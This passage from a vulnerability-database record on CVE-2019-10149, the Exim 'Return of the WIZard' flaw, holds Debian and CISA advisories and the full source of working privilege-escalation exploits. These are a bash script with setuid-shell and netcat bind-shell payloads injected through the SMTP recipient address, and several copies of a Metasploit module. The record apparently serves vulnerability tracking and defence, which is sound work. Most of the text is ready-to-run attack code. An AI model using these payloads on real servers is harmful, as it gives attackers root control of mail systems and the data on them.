Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2019-06-05T15:35:18", "published": "2019-06-05T15:35:18", "id": "DEBIAN:DSA-4456-1:5D64B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00101.html", "title": "[SECURITY] [DSA 4456-1] exim4 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-06-18T11:49:32", "description": "", "published": "2019-06-17T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "PACKETSTORM:153312", "href": "https://packetstormsecurity.com/files/153312/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/bash \n \n# \n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit \n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution. \n# (CVE-2019-10149) \n# \n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team. 
\n# \n# Credits: \n# Qualys Security Advisory team (kudos for your amazing research!) \n# Dennis 'dhn' Herrmann (/dev/tcp technique) \n# \n# Usage (setuid method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m setuid \n# Preparing setuid shell helper... \n# Delivering setuid payload... \n# [...] \n# Waiting 5 seconds... \n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned \n# # id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Usage (netcat method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m netcat \n# Delivering netcat payload... \n# Waiting 5 seconds... \n# localhost [127.0.0.1] 31337 (?) open \n# id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Vulnerable platforms: \n# Exim 4.87 - 4.91 \n# \n# Tested against: \n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] \n# \n \nMETHOD=\"setuid\" # default method \nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost' \nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost' \n \n# usage instructions \nfunction usage() \n{ \necho \"$0 [-m METHOD]\" \necho \necho \"-m setuid : use the setuid payload (default)\" \necho \"-m netcat : use the netcat payload\" \necho \nexit 1 \n} \n \n# payload delivery \nfunction exploit() \n{ \n# connect to localhost:25 \nexec 3<>/dev/tcp/localhost/25 \n \n# deliver the payload \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho \"rcpt to:<$PAYLOAD>\" >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in {1..31} \ndo \necho \"Received: $i\" >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n} \n \n# print banner \necho \necho 
'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit' \necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' \necho \n \n# parse command line \nwhile [ ! -z \"$1\" ]; do \ncase $1 in \n-m) shift; METHOD=\"$1\"; shift;; \n* ) usage \n;; \nesac \ndone \nif [ -z $METHOD ]; then \nusage \nfi \n \n# setuid method \nif [ $METHOD = \"setuid\" ]; then \n \n# prepare a setuid shell helper to circumvent bash checks \necho \"Preparing setuid shell helper...\" \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c \ngcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null \nif [ $? -ne 0 ]; then \necho \"Problems compiling setuid shell helper, check your gcc.\" \necho \"Falling back to the /bin/sh method.\" \ncp /bin/sh /tmp/pwned \nfi \necho \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_SETUID \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nls -l /tmp/pwned \n/tmp/pwned \n \n# netcat method \nelif [ $METHOD = \"netcat\" ]; then \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_NETCAT \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nnc -v 127.0.0.1 31337 \n \n# print help \nelse \nusage \nfi \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/153312/raptor_exim_wiz.sh.txt"}, {"lastseen": "2019-08-24T22:40:27", "description": "", "published": "2019-08-23T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "PACKETSTORM:154198", "href": "https://packetstormsecurity.com/files/154198/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download 
\n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'expect' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation', \n'Description' => %q{ \nThis module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). \nImproper validation of recipient address in deliver_message() \nfunction in /src/deliver.c may lead to command execution with root privileges \n(CVE-2019-10149). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # Discovery and PoC (@qualys) \n'Dennis Herrmann', # Working exploit (@dhn) \n'Marco Ivaldi', # Working exploit (@0xdea) \n'Guillaume Andr\u00e9' # Metasploit module (@yaumn_) \n], \n'DisclosureDate' => '2019-06-05', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Exim 4.87 - 4.91', \nlower_version: Gem::Version.new('4.87'), \nupper_version: Gem::Version.new('4.91') \n] \n], \n'DefaultOptions' => \n{ \n'PrependSetgid' => true, \n'PrependSetuid' => true \n}, \n'References' => \n[ \n[ 'CVE', '2019-10149' ], \n[ 'EDB', '46996' ], \n[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ] \n] \n)) \n \nregister_options( \n[ \nOptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ]) \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]), \nOptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n]) \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef encode_command(cmd) \n'\\x' + 
cmd.unpack('H2' * cmd.length).join('\\x') \nend \n \ndef open_tcp_connection \nsocket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client) \nparams = Rex::Socket::Parameters.new({ \n'PeerHost' => '127.0.0.1', \n'PeerPort' => datastore['EXIMPORT'] \n}) \nbegin \nsocket = socket_subsystem.create_tcp_client_channel(params) \nrescue => e \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nraise e \nend \nreturn socket_subsystem, socket \nend \n \ndef inject_payload(payload) \nif session.type == 'meterpreter' \nsocket_subsystem, socket = open_tcp_connection \n \ntcp_conversation = { \nnil => /220/, \n'helo localhost' => /250/, \n\"MAIL FROM:<>\" => /250/, \n\"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/, \n'DATA' => /354/, \n'Received:' => nil, \n'.' => /250/ \n} \n \nbegin \ntcp_conversation.each do |line, pattern| \nTimeout.timeout(datastore['SendExpectTimeout']) do \nif line \nif line == 'Received:' \nfor i in (1..31) \nsocket.puts(\"#{line} #{i}\\n\") \nend \nelse \nsocket.puts(\"#{line}\\n\") \nend \nend \nif pattern \nsocket.expect(pattern) \nend \nend \nend \nrescue Rex::ConnectionError => e \nfail_with(Failure::Unreachable, e.message) \nrescue Timeout::Error \nfail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') \nensure \nsocket.puts(\"QUIT\\n\") \nsocket.close \nsocket_subsystem.shutdown \nend \nelse \nunless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\ \n\"&& echo true\").chomp.to_s == 'true' \nfail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\") \nend \n \nbash_script = %| \n#!/bin/bash \n \nexec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']} \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho 'rcpt to:<${run{#{payload}}}@localhost>' >&3 \nread -u 3 && echo $REPLY \necho 
\"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in $(seq 1 30); do \necho 'Received: $i' >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n| \n \n@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@bash_script_path, bash_script) \nregister_file_for_cleanup(@bash_script_path) \nchmod(@bash_script_path) \ncmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\") \nend \n \nprint_status('Payload sent, wait a few seconds...') \nRex.sleep(5) \nend \n \ndef check_for_bash \nunless command_exists?('/bin/bash') \nfail_with(Failure::NotFound, 'bash not found') \nend \nend \n \ndef on_new_session(session) \nsuper \n \nif session.type == 'meterpreter' \nsession.core.use('stdapi') unless session.ext.aliases.include?('stdapi') \nsession.fs.file.rm(@payload_path) \nelse \nsession.shell_command_token(\"rm -f #{@payload_path}\") \nend \nend \n \ndef check \nif session.type == 'meterpreter' \nbegin \nsocket_subsystem, socket = open_tcp_connection \nrescue \nreturn CheckCode::Safe \nend \nres = socket.gets \nsocket.close \nsocket_subsystem.shutdown \nelse \ncheck_for_bash \nres = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\ \n\"(read -u 3 && echo $REPLY) || echo false'\") \nif res == 'false' \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nreturn CheckCode::Safe \nend \nend \n \nif res =~ /Exim ([0-9\\.]+)/i \nversion = Gem::Version.new($1) \nvprint_status(\"Found exim version: #{version}\") \nif version >= target[:lower_version] && version <= target[:upper_version] \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nCheckCode::Unknown \nend \n \ndef exploit \nif is_root? \nunless datastore['ForceExploit'] \nfail_with(Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.') \nend \nend \n \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \nif nosuid?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\") \nend \n \nunless datastore['PrependSetuid'] && datastore['PrependSetgid'] \nfail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\ \n'to get root privileges.') \nend \n \nif session.type == 'shell' \ncheck_for_bash \nend \n \n@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@payload_path, payload.encoded_exe) \nregister_file_for_cleanup(@payload_path) \ninject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\ \n\"chmod 4755 #{@payload_path}'\")) \n \nunless setuid?(@payload_path) \nfail_with(Failure::Unknown, \"Couldn't escalate privileges\") \nend \n \ncmd_exec(\"#{@payload_path} & echo \") \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154198/exim4_deliver_message_priv_esc.rb.txt"}], "cisa": [{"lastseen": "2021-02-24T18:06:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "The National Security Agency (NSA) has released a cybersecurity advisory on Russian advanced persistent threat (APT) group Sandworm exploiting a vulnerability\u2014CVE-2019-10149\u2014in Exim Mail Transfer Agent (MTA) software. 
An unauthenticated remote attacker can use this vulnerability to send a specially crafted email to execute commands with root privileges, allowing the attacker to install programs, modify data, and create new accounts.\n\nAlthough Exim released a [security update](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) for the MTA vulnerability in June 2019, Sandworm cyber actors have been exploiting this vulnerability in unpatched Exim servers since at least August 2019 according to NSA\u2019s advisory, which provides indicators of compromise and mitigations to detect and block exploit attempts.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators and users to upgrade to the latest version of Exim and review NSA\u2019s [Advisory: Exim Mail Transfer Agent Actively Exploited by Russian GRU Cyber Actors](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>) and Exim\u2019s page on [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>); we'd welcome your feedback.\n", "modified": "2020-05-28T00:00:00", "published": "2020-05-28T00:00:00", "id": "CISA:0112C06A4ED522FC96CC36F94A083A95", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim", "type": "cisa", "title": "NSA Releases Advisory on Sandworm Actors Exploiting an Exim Vulnerability ", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-02-24T18:07:06", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "Exim has released patches to address a vulnerability affecting Exim versions 4.87\u20134.91. A remote attacker could exploit this vulnerability to take control of an affected email server. This vulnerability was detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Exim [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) page and either upgrade to Exim 4.92 or apply the necessary patches.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2019/06/13/Exim-Releases-Security-Patches>); we'd welcome your feedback.\n", "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "CISA:8012376262FFBCAA3DBEE889B5EE4625", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/06/13/Exim-Releases-Security-Patches", "type": "cisa", "title": "Exim Releases Security Patches", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2021-02-25T18:36:01", "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). 
Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).\n", "published": "2019-07-04T14:02:03", "type": "metasploit", "title": "Exim 4.87 - 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\n 'Description' => %q{\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n Improper validation of recipient address in deliver_message()\n function in /src/deliver.c may lead to command execution with root privileges\n (CVE-2019-10149).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Qualys', # Discovery and PoC (@qualys)\n 'Dennis Herrmann', # Working exploit (@dhn)\n 'Marco Ivaldi', # Working exploit (@0xdea)\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\n ],\n 'DisclosureDate' => '2019-06-05',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' =>\n [\n [\n 'Exim 4.87 - 4.91',\n lower_version: Rex::Version.new('4.87'),\n upper_version: Rex::Version.new('4.91')\n ]\n ],\n 'DefaultOptions' =>\n {\n 'PrependSetgid' => true,\n 'PrependSetuid' => true\n },\n 'References' =>\n [\n [ 'CVE', '2019-10149' ],\n [ 'EDB', '46996' ],\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\n ]\n 
)\n )\n\n register_options(\n [\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\n ]\n )\n\n register_advanced_options(\n [\n OptFloat.new('ExpectTimeout', [ true, 'Timeout for Expect when communicating with exim', 3.5 ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n )\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def encode_command(cmd)\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\n end\n\n def open_tcp_connection\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\n params = Rex::Socket::Parameters.new({\n 'PeerHost' => '127.0.0.1',\n 'PeerPort' => datastore['EXIMPORT']\n })\n begin\n socket = socket_subsystem.create_tcp_client_channel(params)\n rescue StandardError => e\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n raise e\n end\n return socket_subsystem, socket\n end\n\n def inject_payload(payload)\n if session.type == 'meterpreter'\n socket_subsystem, socket = open_tcp_connection\n\n tcp_conversation = {\n nil => /220/,\n 'helo localhost' => /250/,\n 'MAIL FROM:<>' => /250/,\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\n 'DATA' => /354/,\n 'Received:' => nil,\n '.' 
=> /250/\n }\n\n begin\n tcp_conversation.each do |line, pattern|\n if line\n if line == 'Received:'\n for i in (1..31)\n socket.puts(\"#{line} #{i}\\n\")\n end\n else\n socket.puts(\"#{line}\\n\")\n end\n end\n\n next unless pattern\n\n unless socket.expect(pattern, datastore['ExpectTimeout'])\n fail_with(Failure::TimeoutExpired, \"Pattern not found: #{pattern.inspect}\")\n end\n end\n rescue Rex::ConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n ensure\n socket.puts(\"QUIT\\n\")\n socket.close\n socket_subsystem.shutdown\n end\n else\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\n '&& echo true').chomp.to_s == 'true'\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\n end\n\n bash_script = %|\n #!/bin/bash\n\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\n read -u 3 && echo $REPLY\n echo \"helo localhost\" >&3\n read -u 3 && echo $REPLY\n echo \"mail from:<>\" >&3\n read -u 3 && echo $REPLY\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\n read -u 3 && echo $REPLY\n echo \"data\" >&3\n read -u 3 && echo $REPLY\n for i in $(seq 1 30); do\n echo 'Received: $i' >&3\n done\n echo \".\" >&3\n read -u 3 && echo $REPLY\n echo \"quit\" >&3\n read -u 3 && echo $REPLY\n |\n\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@bash_script_path, bash_script)\n register_file_for_cleanup(@bash_script_path)\n chmod(@bash_script_path)\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\n end\n\n print_status('Payload sent, wait a few seconds...')\n Rex.sleep(5)\n end\n\n def on_new_session(session)\n super\n\n if session.type == 'meterpreter'\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\n session.fs.file.rm(@payload_path)\n else\n session.shell_command_token(\"rm -f #{@payload_path}\")\n end\n end\n\n def check\n if session.type == 'meterpreter'\n begin\n socket_subsystem, socket = open_tcp_connection\n rescue 
StandardError\n return CheckCode::Safe\n end\n res = socket.gets\n socket.close\n socket_subsystem.shutdown\n else\n unless command_exists?('/bin/bash')\n return CheckCode::Safe('bash not found')\n end\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\n \"(read -u 3 && echo $REPLY) || echo false'\")\n if res == 'false'\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n return CheckCode::Safe\n end\n end\n\n if res =~ /Exim ([0-9\\.]+)/i\n version = Rex::Version.new(Regexp.last_match(1))\n vprint_status(\"Found exim version: #{version}\")\n if version >= target[:lower_version] && version <= target[:upper_version]\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n CheckCode::Unknown\n end\n\n def exploit\n if is_root?\n unless datastore['ForceExploit']\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\n end\n end\n\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n if nosuid?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\n end\n\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\n 'to get root privileges.')\n end\n\n unless session.type == 'meterpreter'\n unless command_exists?('/bin/bash')\n fail_with(Failure::NotFound, 'bash not found')\n end\n end\n\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@payload_path, payload.encoded_exe)\n register_file_for_cleanup(@payload_path)\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\n \"chmod 4755 #{@payload_path}'\"))\n\n unless setuid?(@payload_path)\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\n end\n\n cmd_exec(\"#{@payload_path} & echo 
\")\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb"}, {"lastseen": "2020-10-15T08:03:24", "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).\n", "published": "2019-07-04T14:02:03", "type": "metasploit", "title": "Exim 4.87 - 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2020-07-18T10:00:14", "id": "MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\n 'Description' => %q{\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n Improper validation of recipient address in deliver_message()\n function in /src/deliver.c may lead to command execution with root privileges\n (CVE-2019-10149).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Qualys', # Discovery and PoC (@qualys)\n 'Dennis Herrmann', # Working exploit (@dhn)\n 'Marco Ivaldi', # Working exploit (@0xdea)\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\n ],\n 'DisclosureDate' => '2019-06-05',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' =>\n [\n [\n 'Exim 4.87 - 4.91',\n lower_version: 
Gem::Version.new('4.87'),\n upper_version: Gem::Version.new('4.91')\n ]\n ],\n 'DefaultOptions' =>\n {\n 'PrependSetgid' => true,\n 'PrependSetuid' => true\n },\n 'References' =>\n [\n [ 'CVE', '2019-10149' ],\n [ 'EDB', '46996' ],\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\n ]\n )\n )\n\n register_options(\n [\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\n ]\n )\n\n register_advanced_options(\n [\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\n OptFloat.new('ExpectTimeout', [ true, 'Timeout for Expect when communicating with exim', 3.5 ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n )\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def encode_command(cmd)\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\n end\n\n def open_tcp_connection\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\n params = Rex::Socket::Parameters.new({\n 'PeerHost' => '127.0.0.1',\n 'PeerPort' => datastore['EXIMPORT']\n })\n begin\n socket = socket_subsystem.create_tcp_client_channel(params)\n rescue StandardError => e\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n raise e\n end\n return socket_subsystem, socket\n end\n\n def inject_payload(payload)\n if session.type == 'meterpreter'\n socket_subsystem, socket = open_tcp_connection\n\n tcp_conversation = {\n nil => /220/,\n 'helo localhost' => /250/,\n 'MAIL FROM:<>' => /250/,\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\n 'DATA' => /354/,\n 'Received:' => nil,\n '.' 
=> /250/\n }\n\n begin\n tcp_conversation.each do |line, pattern|\n if line\n if line == 'Received:'\n for i in (1..31)\n socket.puts(\"#{line} #{i}\\n\")\n end\n else\n socket.puts(\"#{line}\\n\")\n end\n end\n\n next unless pattern\n\n unless socket.expect(pattern, datastore['ExpectTimeout'])\n fail_with(Failure::TimeoutExpired, \"Pattern not found: #{pattern.inspect}\")\n end\n end\n rescue Rex::ConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n ensure\n socket.puts(\"QUIT\\n\")\n socket.close\n socket_subsystem.shutdown\n end\n else\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\n '&& echo true').chomp.to_s == 'true'\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\n end\n\n bash_script = %|\n #!/bin/bash\n\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\n read -u 3 && echo $REPLY\n echo \"helo localhost\" >&3\n read -u 3 && echo $REPLY\n echo \"mail from:<>\" >&3\n read -u 3 && echo $REPLY\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\n read -u 3 && echo $REPLY\n echo \"data\" >&3\n read -u 3 && echo $REPLY\n for i in $(seq 1 30); do\n echo 'Received: $i' >&3\n done\n echo \".\" >&3\n read -u 3 && echo $REPLY\n echo \"quit\" >&3\n read -u 3 && echo $REPLY\n |\n\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@bash_script_path, bash_script)\n register_file_for_cleanup(@bash_script_path)\n chmod(@bash_script_path)\n cmd_exec(\"/bin/bash -c 